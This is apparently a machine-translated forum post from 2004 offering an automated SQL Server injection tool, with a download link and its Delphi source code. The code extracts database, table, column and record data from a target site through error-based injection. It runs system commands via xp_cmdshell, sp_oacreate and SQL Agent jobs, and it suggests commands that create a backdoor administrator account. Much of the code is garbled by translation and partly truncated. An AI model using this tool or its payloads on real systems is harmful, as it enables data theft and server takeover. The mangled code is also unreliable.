SQL Server Injection Tool 1.0
Using SQL Server's injection vulnerability to deal with the information of the database name, the table name, the field name, and records. Due to the reason of the network speed, the record information that can only guess the top 5 field values can only be guess. Also implement three ways to execute system commands, while it can be displayed.
This program is only for testing research, and the consequences of this software are not responsible, and the code is inevitably leaking because the writing is more rushing.
Download address: http://free.efile.com.cn/hnxyy/nbsi.exe
Author: Hnxyy QQ: 19026695
2004.12.16 Beijing
Firefox Technology Exchange Forum http://www.wrsky.com Temporary Access Address http://firefoxer.nease.Netit Is All Beginnings Freeit Is All Ruin to Be Privately Ownds 7 Original Code: Unit Untmain
Interface
uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, OleCtrls, SHDocVw, mshtml;
type TForm1 = class (TForm) Label1: TLabel; EdtUrl: TEdit; BtnCheck: TButton; Label2: TLabel; GroupBox1: TGroupBox; Label7: TLabel; Label3: TLabel; Label4: TLabel; Label5: TLabel; Label6: TLabel; EdtMuliCase: TEdit ; EdtQuery: TEdit; EdtUser: TEdit; EdtPower: TEdit; EdtDbName: TEdit; Memo1: TMemo; GroupBox2: TGroupBox; cbDisp: TCheckBox; EdtCommand: TEdit; rbCmd: TRadioButton; rbOA: TRadioButton; btnExecute: TButton; GroupBox3: TGroupBox; Memo2 : TMemo; wb: TWebBrowser; BtnStop: TButton; rbJob: TRadioButton; btnCancel: TButton; procedure BtnCheckClick (Sender: TObject); procedure BtnExecuteClick (Sender: TObject); procedure wbDocumentComplete (Sender: TObject; const pDisp: IDispatch; var URL: OleVariant); procedure BtnStopClick (Sender: TObject); procedure rbCmdClick (Sender: TObject); procedure rbOAClick (Sender: TObject); procedure rbJobClick (Sender: TObject); procedure FormShow (S ender: TObject); procedure BtnCancelClick (Sender: TObject); private {Private declarations} tag: integer; isFinish, isCancel: boolean; function Get (URL: string): boolean; function GetWBMsg (URL: string): string; Function StrToNChar (DBNAME, TNAME: STRING): String; Procedure setrdbcheck (rd: tradiobutton); public {public declarations} End; var form1: tform1;
IMPLEMENTATION
{$ R * .dfm}
procedure TForm1.BtnCheckClick (Sender: TObject); const vFieldCount = 5; PowerStr: array [0..6] of string = ( 'sysadmin', 'dbcreator', 'diskadmin', 'processadmin', 'serveradmin', 'setupadmin ',' securityadmin '); var Url, DbName, TName, TName0, ColName, ColName0, NCharStr: string; i, j, k, iCount: integer; verStr, valueStr, CountStr, Powers: string; FieldStr, FieldOrdStr, CFieldStr: String; vfield: olevariant; begin try edtmulicase.text: = '; edtquery.text: ='; edtuser.text: = '; edtpower.text: ='; edtdbname.text: = '; URL: = trim (edturl.text); isfinish: = false; vfield: = varRaycreate ([0, vfieldcount-1], varvariant); memo1.clear; screen.cursor: = cr HOURGLASS; // Decision Support multiple query if get (URL '; DECLARE% 20 @ a% 20INT -') Then Begin edtmulicase.text: = 'Support'; ELSE BEGIN EDTMULICASE.TEXT: = 'does not support'; END; // Judgment whether the child query IF GET (URL '% 20And% 20 (SELECT% 20count (1)% 20From% 20 [sysobjects])> = 0') Then Begin edtquery.text: = 'Support'; Else Begin Edtque Ry.Text: = 'does not support'; end; // get the current user EDTUSER.TEXT: = getWBMSG (URL '% 20and% 20CHAR (124)% 2buser% 2bchar (124) = 0'); // Get the current user Sign in server role member for i: = 0 to high (power) do begin if get (URL '% 20and% 20cast (is_srvrolemember (' '' PowerSTR [i] '')% 20AS% 20VARCHAR (1)) = 1 ') THEN BEGIN POWERS: = PowerS PowerSTR [I] ' | '; end; end; if PowerS =' 'TEN EDTPOWER.TEXT: =' Unknown '
Else Edtpower.Text: = PowerS; / / Indicates if the current user is a member of the DB_OWNER fixed database role {if Get (is_member ('' 'db_owner')% 20AS% 20VARCHAR (1)) = 1 ') The begin edtpower.text: =' db_owner '; end else begin edtpower.text: =' unknown '; end;} // get the current SQL Server version number VERSTR: = getWBMSG (URL '% 20and% 20CHAR (124 )% 2b @@ version% 2bchar (124)> 0 '); memo1.lines.add (' Current version number: ' verstr); memo1.lines.add (' '); // get database name dbname: = GetWBMSG (URL '% 20and% 20CHAR (124)% 2BDB_NAME ()% 2bchar (124) = 0'); edtdbname.text: = dbname; if (dbname = ') or (dbname =' unknown ') THEN Begin Memo1 .LINES.ADD ('unknown database, operation termination!'); Exit; end; memo1.Lines.add ('Current Database:' DBNAME); btnStop.visible: = true; btncheck.visible: = false; / / Guess the table name Memo1.Lines.Add (''); memo1.lines.add ('Start guessing table name .....); memo1.lines.add (' ######## ################); for i: = 1 to 1000 do begin tname: = ''; TNAME: = getWBMSG (URL '% 20And% 20 (SELECT% 20top% 201 % 20CAST (CHAR (124)% 2BNAME% 2Bchar (124)% 20AS% 20Varchar (8000)) ' '% 20FROM (SELECT% 20top% 20' INTSTOSTR (i) '% 20ID, NAME% 20FROM% 20 [' DBNAME '] .. [sysobjects]' '% 20where% 20XTYPE = CHAR (85)% 20ORDER % 20BY% 20ID)% 20T% 20DER% 20BY% 20ID% 20DESC)> 0; - '); if (tname0 = tname) or (isfinish) Then Break; memo1.lines.add (' Name: ' TNAME ); // guess the column Memo1.Lines.Add (''); memo1.lines.add ('Start goueting column name .....);
Memo1.Lines.Add ('#################); ncharstr: ='; ncharstr: = strtonchar (dbname, tname); J : = 1; While J <1000 Do Begin ColName: = '; ColName: = GetWBMSG (URL '% 20And% 20 (SELECT% 20top% 201% 20cast (char (124)% 2BNAME% 2bchar (124) ' ' % 20AS% 20Varchar (8000))% 20From% 20 (select% 20top% 20 ' INTOSTR (J) % 20Colid, Name' '% 20FROM% 20 [' DBNAME '] .. [Syscolumns]% 20where % 20ID% 20 =% 20 ' ncharstr '% 20ORDER% 20BY% 20Colid)% 20t% 20ORDER% 20BY% 20Colid% 20DESC)> 0; - '); if (colname0 = colname) or (isfinish) THEN J: = 1000 else begin memo1.lines.add ('column name' INTOSTR (J) ':' colname); if j
CountStr 'strip data. '); Cfieldstr: =' '; fieldStr: ='; Fieldordstr: = '; fork: = 0 to vfieldcount-1 do begin if k = 0 Then Begin cfieldstr: =' Isnull ([' vfield [0] ']% 20VARCHAR (8000)), char (32))'; FieldStr: = '[' vfield [0] ']'; FieldordStr: = '[' vfield [0] ']% 20Desc'; END ELSE BEGIN CFIELDSTR: = CFIELDSTR '% 2B% 20% 2Bisnull (Cast ([' vfield [k] ']% 20AS% 20Varchar (8000)), char (32))'; FieldStr : = FieldStr ', [' Vfield [K] ']'; FieldordStr: = FieldORDSTR ', [' Vfield [k] ']% 20Desc'; end; end; k: = 1; While K
IF iSFINISH TEN K: = ICOUNT 1; Memo1.Lines.Add ('Data' INTOSTR (K) ':' VALUESTR); INC (K); End; Memo1.Lines.Add ('#### #############); memo1.lines.add ('data guess end .....); memo1.lines.add (' ') TNAME0: = TNAME; End; memo1.Lines.add ('########################################################################################################################################################### Guess the end ..... '); Finally Screen.cursor: = crdefault; btnStop.visible: = false; btncheck.visible: = true; end;
procedure TForm1.BtnExecuteClick (Sender: TObject); var Url, DbName, CommandStr: string; ResultStr, CountStr: string; iCount, i: integer; begin try Url: = trim (EdtUrl.Text); ResultStr: = ''; CommandStr : = '; Iscancel: = false; commandstr: = trim (edtcommand.text); CommandStr: = StringReplace (CommandStr,'% ','% 25 ', [RFREPLACEALL]); CommandStr: = StringReplace (CommandStr,' ' , '% 20', [RFREPLACEALL]); memo2.clear; screen.cursor: = cr HOURGLAS; // acquired database name dbname: = getWBMSG (URL '% 20and% 20CHAR (124)% 2BDB_NAME ()% 2bchar (124) = 0 '); if (dbname =') or (DBNAME = 'unknown') Then Begin memo2.Lines.Add ('unknown database, operation termination!'); Exit; end; // cmd_shell // use xp_cmdshell To run the system command if rbcmd.checked the begin // = true; btnexecute.visible: = false; // The first method // Save the result of the command to one In the local file, then write the content of this file to the new temporary table for output {CommandStr: = URL '; EXEC% 20MASTER..' COMMDSHELL% 20 '' ' COMMANDSTR '> C: /command_tmp.log '' ' '; Drop% 20table% 20 [command_tmp]' '; Create% 20table% 20 [command_tmp] ([Resulttxt]% 20 voltor (7996)% 20null)' '; Bulk% 20insert% 20 [' DBNAME ']. [Command_tmp]% 20FROM% 20''c: /command_tmp.log ''% 20with% 20 (Keepnulls) ' '; ALTER% 20Table% 20 [Command_TMP]% 20ADD% 20 [ID]% 20INT% 20NOT% 20NULL % 20IDENTITY% 20 (1, 1) - ';
// Second approach, directly write the result of the command to the output, the efficiency is higher to CommandStr: = URL '; DROP% 20table% 20 [command_tmp];' 'create% 20table% 20 [command_tmp] ID]% 20INT% 20Not% 20null% 20Identity% 20 (1, 1), ' '% 20 [Resulttxt]% 20NULL); ' ' INSERT% 20NTO% 20 [command_tmp] (Resulttxt)% 20EXEC% 20MASTER.. '' ' CommandStr ' '' '' '' '' ' CommandStr ' '; INSERT% 20InTO% 20 [Command_TMP]% 20VALUES% 20 (' 'g_over' ') -';
IF GET (CommandStr) THEN Begin CountStr: = getWBMSG (URL '% 20 -% 2Bcast (20)' '% 2bchar (124)% 20FROM (124)% 20ROM (124)% 20FROM % 20 [Command_TMP]% 20where% 201 = 1)> 0; - '); try iCount: = start (countstr); Except Memo2.Lines.Add (' Unexpected data, operation termination! '); End; end; For i: = 1 to iCount Do Begin Resultstr: = '; Resultstr: = getWBMSG (URL '% 20And% 20 (SELECT% 20top% 201% 20case% 20When% 20ResulttxtXt% 20then% 20null ' '% 20then% 20CHAR (32)% 20ELSE% 20CHAR (124)% 2BRESULTTXT% 2Bchar (124) ' '% 20ED% 20FROM% 20 [command_tmp]% 20where% 20 ID = ' INTOSTR (i) ') = 0; - ') If ISCANCEL THEN BREAK; if (ResultStr <> 'unknown') THEN Memo2.Lines.Add (ResultStr); end; end; if get (URL '; DROP% 20table% 20 [Command_TMP ] - ') The begin Memo2.Lines.Add (' Command Completion '); end; end else begin commandstr: = url '; EXEC% 20MASTER.. '' COMMANDSTR '' '-'; if Get (Commandstr) THEN MEMO2.LINES.ADD ('Command Execute it.
'); End; end; // oacreate // Use sp_oacreate to run the system command if rboa.checked the begin // Indicate whether the current user is a member IF GET (URL '% 20and% 20CAST (IS_SRVROLEMEMBER (') of the Sysadmin fixed server role 'sysadmin' ')% 20AS% 20Varchar (1)) = 1') Then Begin Commandstr: = URL '; USE% 20' DBNAME '; declare% 20 @ O% 20INT; EXEC% 20' 'sp_oacreate% 20 '' wscript.shell ', @ o% 20Out; EXEC% 20' 'sp_oamethod% 20 @ O,' 'Run' ', NULL,' 'CMD% 20 / C% 20' CommandStr '' - '; If Get (CommandStr) Then Memo2.Lines.Add ('); END ELSE BEGIN MEMO2.LINES.ADD ('member of only the sysadmin fixed server role can perform sp_oacreate.
'); EXIT; END; END; // JOB // Use SQLServerAgent's job to run system command if rbjob.checked the begin // Start SQLSerVERAGENT IF GET (URL '; EXEC% 20master "xp_servicecontrol% 20'Start ' ',' 'Sqlservergent' '; -') Then Begin Memo2.Lines.add ('SQLServerAgent Successful!'); CommandStr: = URL '; USE% 20' DBNAME '; EXEC% 20sp_delete_JOB% 20null,' ' X '' ' '; EXEC% 20sp_add_job% 20' '' '' ' '; EXEC% 20sp_add_jobstep% 20null, '' '', ',' 'cmdexec', '' CMD % 20 / C% 20 ' CommandStr ' '; EXEC% 20sp_ADD_JOBSERVER% 20NULL,' '' ', @@ Servername' '; EXEC% 20SP_Start_JOB% 20'' '' - '; if Get (CommandStr) "The Memo2.Lines.Add ('); END ELSE BEGIN MEMO2.LINES.ADD (' SQLServerAgent failed, operation termination! '); exit; end; end; finally screen.cursor: = crdefault; BTNEXECUTE.Visible: = true; btncel.visible: = false; end;
Function TFORM1.GET (URL: STRING): Boolean; var IDHTTP: TIDHTTP; SS: STRING; begin result: = false; idHttp: = tidHttp.create (nil); try idhttp.handleredirects: = true; // must support Redirection, otherwise Idhttp.ReadTimeout: = 30000; // More than this time no longer access SS: = IDHTTP.GET (URL); if idhttp.responsecode = 200 Then Result: = true; Except // on E: Exception Do // Application.MessageBox (Pchar ('has an exception, termination!' # 10 # 13 E.MESSAGE), 'Tip', MB_OK MB_ICONICONFORMATION); end; finary iDHTTP.Free; end; end; function tform1 .GETWBMSG (URL: String): String; Function GetResultStr (str: string): string; var iStart, IEND: Integer; ss: string; begin iStart: = POS ('|', str); if iStart> 0 THEN BEGIN SS: = COPY (STR, ISTART 1, Length (Str) -istart); IEND: = POS ('|', SS); if Ind> 0 THEN BEGIN SS: = Copy (SS, 1, IEND-1) End; end; if ss = '' Then Result: = 'unknown' else result: = ss; end; var ss: string; begin tag: = 0; wb.navigate (URL); WHI Le (tag = 0) Do Application.ProcessMessages; ss: = (wb.document as htmldocument2) .Body.innertext; Result: = GetResultStr (ss);
Function TFORM1.STRTONCHAR (DBNAME, TNAME: STRING): String; Var i: integer; ss, str: string; begin ss: = dbname '..' tname; for i: = 1 to length (ss) do beginiff I = 1 Then str: = 'nchar (' INTTOSTR (ORD (SS [i])) ')' Else Str: = Str '% 2bnchar (' INTOSTR (ORD (SS [i])) ') '; End; Result: =' Object_ID (' Str ') '; END;
procedure TForm1.wbDocumentComplete (Sender: TObject; const pDisp: IDispatch; var URL: OleVariant); begin //Memo2.Text: = (wb.Document as IHTMLDocument2) .Body.innerText; tag: = 1; end; procedure TForm1. BTNSTOPCLICK (Sender: TOBJECT); Begin isfinish: = true; btncheck.visible: = true; btnstop.visible: = false;
Procedure tform1.setrdbcheck (rd: tradiobutton); begin memo2.clear; if rd = rbcmd the beginning; memo2.lines.add ('Using xp_cmdshell to run system command'); memo2.lines.add ( ''); Memo2.Lines.Add ('Net User Test Test / Add'); Memo2.Lines.Add ('Net Localgroup Administrators Test / Add'); Memo2.Lines.Add ('Exec Master..np_addlogin Test, Test '); Memo2.Lines.Add (' exec master..sp_addsrvrolemember test, sysadmin '); end; if rd = rboa the begin cbdisp.Enabled: = false; memo2.lines.add (' Using sp_oacreate to run system command '); End; if rd = rbjob1 begin cbdisp.enabled: = false; memo2.lines.add (' Using SQLServerAgent Job to run system command '); Memo2.Lines.Add (' Please start SQLServerAgent first using the following statement : '); Memo2.Lines.Add (' '); memo2.lines.add (' http://x.com/x.asp?a=1 ;ec master..xp_serviceControl '' Start ',' ' SQLSERVERAGENT '' '; -'); end; end;
Procedure TFORM1.RBCMDCLICK (Sender: TOBJECT); Begin Setrdbcheck (RBCMD); END;
Procedure TFORM1.RBOACLICK (Sender: TOBJECT); Begin Setrdbcheck (RBOA); END;
Procedure TFORM1.RBJobClick (Sender: TOBJECT); Begin Setrdbcheck (RBJOB); END;
Procedure TFORM1.FORMSHOW (Sender: TOBJECT); Begin Setrdbcheck (RBCMD); END;
Procedure tForm1.btncelclick (sender: TOBJECT); Begin ISCANCEL: = true; btnexecute.visible: = true; btnce; visible: = false; end; end;
